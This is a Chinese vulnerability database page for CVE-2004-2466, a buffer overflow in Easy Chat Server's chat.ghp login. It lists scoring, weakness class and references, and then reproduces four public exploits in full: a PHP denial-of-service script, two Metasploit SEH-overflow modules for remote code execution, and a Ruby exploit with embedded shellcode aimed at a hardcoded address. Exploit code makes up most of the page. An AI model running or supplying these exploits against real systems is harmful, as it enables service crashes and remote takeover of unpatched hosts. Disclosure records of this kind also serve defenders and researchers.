CVE-2004-2466
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2014-05-22 21:34:01
NMCOEP    

[原文]chat.ghp in Easy Chat Server 1.2 allows remote attackers to cause a denial of service (server crash) via a long username parameter, possibly due to a buffer overflow. NOTE: it was later reported that 2.2 is also affected.


[CNNVD]Easy Chat Server服务拒绝漏洞(CNNVD-200412-469)

        Easy Chat Server 1.2版本中的chat.ghp存在漏洞。远程攻击者可以借助超长username参数导致服务拒绝(服务器崩溃),该漏洞可能归因于缓冲器溢出。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:efs_software:easy_chat_server:1.2
cpe:/a:efs_software:easy_chat_server:2.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2466
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2466
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-469
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/36013
(UNKNOWN)  XF  easychatserver-username-dos(36013)
http://xforce.iss.net/xforce/xfdb/16629
(UNKNOWN)  XF  easychat-chatghp-username-dos(16629)
http://www.vupen.com/english/advisories/2007/2901
(UNKNOWN)  VUPEN  ADV-2007-2901
http://www.securityfocus.com/bid/67384
(UNKNOWN)  BID  67384
http://www.securityfocus.com/bid/25328
(UNKNOWN)  BID  25328
http://www.osvdb.org/7416
(UNKNOWN)  OSVDB  7416
http://www.exploit-db.com/exploits/33326
(UNKNOWN)  EXPLOIT-DB  33326
http://www.autistici.org/fdonato/advisory/EasyChatServer1.2-adv.txt
(VENDOR_ADVISORY)  MISC  http://www.autistici.org/fdonato/advisory/EasyChatServer1.2-adv.txt
http://secunia.com/advisories/26461
(VENDOR_ADVISORY)  SECUNIA  26461
http://secunia.com/advisories/12006
(VENDOR_ADVISORY)  SECUNIA  12006
http://milw0rm.com/exploits/4289
(UNKNOWN)  MILW0RM  4289
http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0077.html
(VENDOR_ADVISORY)  FULLDISC  20040702 Multiple Vulnerabilities in Easy Chat Server 1.2
http://archives.neohapsis.com/archives/bugtraq/2004-07/0013.html
(VENDOR_ADVISORY)  BUGTRAQ  20040702 Multiple Vulnerabilities in Easy Chat Server 1.2

- 漏洞信息

Easy Chat Server服务拒绝漏洞
中危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Easy Chat Server 1.2版本中的chat.ghp存在漏洞。远程攻击者可以借助超长username参数导致服务拒绝(服务器崩溃),该漏洞可能归因于缓冲器溢出。

- 公告与补丁

        

- 漏洞信息 (4289)

Easy Chat Server 2.2 Remote Denial of Service Exploit (EDBID:4289)
windows dos
2007-08-14 Verified
0 NetJackal
[点击下载] [点击下载]
<?php

##########################################################
###----------------------------------------------------###
###--------Easy Chat Server Remote DoS Exploit---------###
###----------------------------------------------------###
###-http://www.echatserver.com/------------------------###
###----------------------------------------------------###
###-Tested on version 2.2 [last version]-(XP SP2)------###
###----------------------------------------------------###
###-Usage:-php dos.php [TARGET] [PORT]-----------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

/*
Description:
 Easy Chat Server has built-in web server let users
login to chat server. Login page allow Max 30 characters
length for Name & Password. If attacker inserts a long Name &
Password by editing or make his own login page, chat server
will crash.
*/
echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
if($argc<2)die("\nUsage:   php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
$host=$argv[1];
$port=$argv[2];
$A=str_repeat('A',999);
echo "\nConnecting...";
$link=fsockopen($host,$port,$en,$es,30);
if(!$link)die("\n$en: $es");
echo "\nConnected!";
echo "\nSending exploit...";
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
echo "\nWell done!\n";
?>

# milw0rm.com [2007-08-14]
		

- 漏洞信息 (16772)

EFS Easy Chat Server Authentication Request Handling Buffer Overflow (EDBID:16772)
windows remote
2010-08-06 Verified
80 metasploit
N/A [点击下载]
##
# $Id: efs_easychatserver_username.rb 9966 2010-08-06 20:12:51Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By
				sending a overly long authentication request, an attacker may be able to execute
				arbitrary code.

				NOTE: The offset to SEH is influenced by the installation path of the program.
				The path, which defaults to "C:\Program Files\Easy Chat Server", is concatentated
				with "\users\" and the string passed as the username HTTP paramter.
			},
			'Author'         => [ 'LSO <lso[at]hushmail.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9966 $',
			'References'     =>
				[
					[ 'CVE', '2004-2466' ],
					[ 'OSVDB', '7416' ],
					[ 'BID', '25328' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3f\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
				],
			'DisclosureDate' => 'Aug 14 2007',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
					"C:\\Program Files\\Easy Chat Server" ])
			], self.class )
	end

	def check
		info = http_fingerprint # check method
		# NOTE: Version 2.2 still reports "1.0" in the "Server" header
		if (info =~ /Easy Chat Server\/1\.0/)
			return Exploit::CheckCode::Appears
		end
		Exploit::CheckCode::Safe
	end

	def exploit
		# randomize some values.
		val = rand_text_alpha(rand(10) + 1)
		num = rand_text_numeric(1)

		path = datastore['PATH'] + "\\users\\"
		print_status("path: " + path)

		# exploit buffer.
		filler = rand_text_alpha(256 - path.length)
		seh    = generate_seh_payload(target.ret)
		juju = filler + seh

		uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#sex=#{num}"

		print_status("Trying target #{target.name}...")

		send_request_raw({'uri' => uri}, 5)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F85363)

Easy Chat Server 2.2 Buffer Overflow (PacketStormID:F85363)
2010-01-19 00:00:00
John Babio  
exploit,overflow
CVE-2004-2466
[点击下载]

EFS Software Easy Chat Server version 2.2 buffer overflow exploit that launches calc.exe.

# Title: Exploit EFS Software Easy Chat Server v2.2 
# EDB-ID: 
# CVE-ID: 2004-2466
# OSVDB-ID: 7416
# Author: John Babio
# Published: 2010-01-17
# Tested on: [Windows XP Sp3 Eng]
# Download Exploit Code
# Download Vulnerable app (https://www.securinfos.info/old_softwares_vulnerable/Easy_Chat_Server_2.2.exe)

#!/usr/bin/ruby

require 'net/http'
require 'uri'
require 'socket'


jmp = "\xeb\x06\x90\x90"
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret

#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a" 

buffer = "\x41" * 216 + jmp + ppr + shellcode

url = URI.parse('http://10.10.99.12')
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
puts res.body





    

- 漏洞信息 (F83219)

EFS Easy Chat Server Authentication Request Handling Buffer Overflow (PacketStormID:F83219)
2009-11-26 00:00:00
LSO  metasploit.com
exploit,overflow,arbitrary
CVE-2004-2466
[点击下载]

This Metasploit module exploits a stack overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in EFS Software Easy Chat Server. By
				sending a overly long authentication request, an attacker may be able to execute
				arbitrary code.
			},
			'Author'         => [ 'LSO <lso[@]hushmail.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2466' ],
					[ 'OSVDB', '7416' ],
					[ 'BID', '25328' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
				],
			'DisclosureDate' => 'Aug 14 2007',
			'DefaultTarget'  => 0))
			
			register_options( [ Opt::RPORT(80) ], self.class )
	end

	def check
		res = send_request_raw
			
			if res and res['Server'] =~ /Easy Chat Server\/1.0/
				return Exploit::CheckCode::Appears
			end

			return Exploit::CheckCode::Safe
	end

	def exploit
		# randomize some values.
		val = rand_text_alpha(rand(10) + 1)
		num = rand_text_numeric(1)

		# exploit buffer.
		filler = rand_text_alpha(216)
		seh    = generate_seh_payload(target.ret)
		juju = filler + seh

		uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}"

		print_status("Trying target #{target.name}...")

		send_request_raw({'uri' => uri}, 5)

		handler
		disconnect
	end

end

    

- 漏洞信息

7416
Easy Chat Server chat.ghp Long Username Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- 漏洞描述

Easy Chat Server contains a flaw that may allow a remote denial of service. The issue is triggered when a GET request is sent with a very long username, and will result in loss of availability for the service.

- 时间线

2004-07-02 Unknow
2004-07-02 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站